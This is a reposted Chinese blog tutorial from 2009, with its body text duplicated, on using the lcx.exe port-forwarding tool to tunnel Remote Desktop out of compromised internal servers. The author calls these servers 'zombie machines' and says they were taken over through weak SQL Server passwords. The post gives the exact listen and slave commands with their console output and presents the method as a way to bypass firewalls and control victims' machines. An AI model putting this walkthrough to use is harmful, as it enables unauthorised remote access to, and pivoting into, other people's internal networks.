转帖:利用LCX穿越防火墙
2009-05-21 14:41
197 查看
以前抓肉鸡都是通过1433弱口令,然后……
但是发现很多服务器开了1433、3389,但是终端连不上。因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上……
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。
例如:在本地控制机B上监听 -listen 51 3389,在肉鸡A上运行-slave B的IP地址 51 A的IP地址 3389,那么在本地控制机B连127.0.0.1就可以连肉鸡A的3389。注:第二条是将本地控制机B的51端口的数据转向3389端口。
首先在本地控制机B的cmd下运行lcx.exe -listen 51 3389,意思是监听51端口并转发到3389端口。
显示如下:[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......
然后在肉鸡A上运行 lcx.exe -slave [本地控制机B的IP] 51 [肉鸡A的IP] 3389
运行以后本地控制机B监听端口就会收到信息.[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......
[+] Accept a Client on port 51 from [肉鸡A的IP] ......
[+] Waiting another Client on port:3389....
好了.现在在自己机子上链接 127.0.0.1 或者输入本地控制机B的IP.
发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!
优点:搞定内网肉鸡。
缺点:有点麻烦。
文章转自:http://blog.nnsky.com/blog_view_75846.html?page=1,有改动。
但是发现很多服务器开了1433、3389,但是终端连不上。因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上……
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。
例如:在本地控制机B上监听 -listen 51 3389,在肉鸡A上运行-slave B的IP地址 51 A的IP地址 3389,那么在本地控制机B连127.0.0.1就可以连肉鸡A的3389。注:第二条是将本地控制机B的51端口的数据转向3389端口。
首先在本地控制机B的cmd下运行lcx.exe -listen 51 3389,意思是监听51端口并转发到3389端口。
显示如下:[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......
然后在肉鸡A上运行 lcx.exe -slave [本地控制机B的IP] 51 [肉鸡A的IP] 3389
运行以后本地控制机B监听端口就会收到信息.[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......
[+] Accept a Client on port 51 from [肉鸡A的IP] ......
[+] Waiting another Client on port:3389....
好了.现在在自己机子上链接 127.0.0.1 或者输入本地控制机B的IP.
发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!
优点:搞定内网肉鸡。
缺点:有点麻烦。
文章转自:http://blog.nnsky.com/blog_view_75846.html?page=1,有改动。
相关文章推荐
- 利用XML穿越防火墙
- 利用SSH port forwarding充分利用SSH创建安全网络通道,穿越防火墙
- AD穿越防火墙同步
- 如何使远程分布事务协调器(DTC)能够穿越防火墙工作
- 利用操作系统提供的API编写防火墙[转载]
- 利用XSLT把ADO记录集转换成XML[转帖]
- Cisco IP Phone 流量研究(穿越防火墙处理方法)
- 利用kiwi_syslog_软件为vigor_防火墙路由器搭建日志服务系统100
- [转帖]高档的moss页面修改工具SPCAMLEditor使用系列(1)--利用SPCAMLEditor,10分钟打造一个在线视频播放库
- jmx rmi 穿越防火墙问题及jmxmp的替代方案
- 利用外网主机穿透本地网络防火墙
- 利用6to4隧道穿越ipv4,实现对ipv6资源的访问
- rmi穿越防火墙
- WebRTC中如何处理NAT和防火墙穿越?
- 穿越防火墙 让远程桌面自由连接
- Centos6.3利用iptables配置网关防火墙
- 利用操作系统提供的API编写防火墙